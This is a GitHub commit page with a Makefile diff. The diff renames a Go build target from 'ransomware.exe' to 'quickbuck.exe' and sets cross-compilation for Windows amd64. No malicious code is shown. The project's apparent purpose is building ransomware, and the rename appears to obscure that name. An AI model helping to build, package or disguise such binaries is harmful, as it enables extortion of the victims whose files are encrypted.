We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 02131e8 commit 6cb99fbCopy full SHA for 6cb99fb
Makefile
@@ -1,6 +1,7 @@
1
-ransomware.exe: $(wildcard cmd/* lib/*/*)
2
-ransomware.exe: GOOS=windows
+quickbuck.exe: $(wildcard cmd/* lib/*/*)
+quickbuck.exe: export GOOS=windows
3
+quickbuck.exe: export GOARCH=amd64
4
-ransomware.exe:
5
- go build -o ransomware.exe ./cmd
+quickbuck.exe:
6
+ go build -o $@ ./cmd
7
0 commit comments